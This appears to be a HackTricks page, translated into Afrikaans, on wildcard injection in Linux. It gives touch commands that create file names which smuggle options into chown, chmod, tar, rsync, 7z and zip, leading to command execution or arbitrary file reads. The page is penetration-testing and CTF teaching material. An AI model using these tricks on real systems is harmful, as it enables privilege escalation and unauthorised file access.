tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

chown, chmod

Jy kan aandui watter lĂȘer eienaar en regte jy wil kopieer vir die res van die lĂȘers

bash
touch "--reference=/my/own/path/filename"

U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (gecombineerde aanval)
Meer inligting in https://www.exploit-db.com/papers/33930

Tar

Voer arbitrĂȘre opdragte uit:

bash
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar aanval)
Meer inligting in https://www.exploit-db.com/papers/33930

Rsync

Voer arbitrĂȘre opdragte uit:

bash
Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
bash
touch "-e sh shell.sh"

U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _aanval)
Meer inligting in https://www.exploit-db.com/papers/33930

7z

In 7z kan jy selfs -- voor * gebruik (let daarop dat -- beteken dat die volgende invoer nie as parameters behandel kan word nie, so net lĂȘerpaaie in hierdie geval) jy kan 'n arbitrĂȘre fout veroorsaak om 'n lĂȘer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word:

bash
7za a /backup/$filename.zip -t7z -snl -p$pass -- *

En jy kan lĂȘers in die gids skep waar dit uitgevoer word, jy kan die lĂȘer @root.txt en die lĂȘer root.txt skep wat 'n symlink na die lĂȘer is wat jy wil lees:

bash
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dan, wanneer 7z uitgevoer word, sal dit root.txt behandel as 'n lĂȘer wat die lys van lĂȘers bevat wat dit moet saamgepers (dit is wat die bestaan van @root.txt aandui) en wanneer 7z root.txt lees, sal dit /file/you/want/to/read lees en aangesien die inhoud van hierdie lĂȘer nie 'n lys van lĂȘers is nie, sal dit 'n fout gooi wat die inhoud toon.

Meer in Write-ups van die boks CTF van HackTheBox.

Zip

Voer arbitrĂȘre opdragte uit:

bash
zip name.zip files -T --unzip-command "sh -c whoami"

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks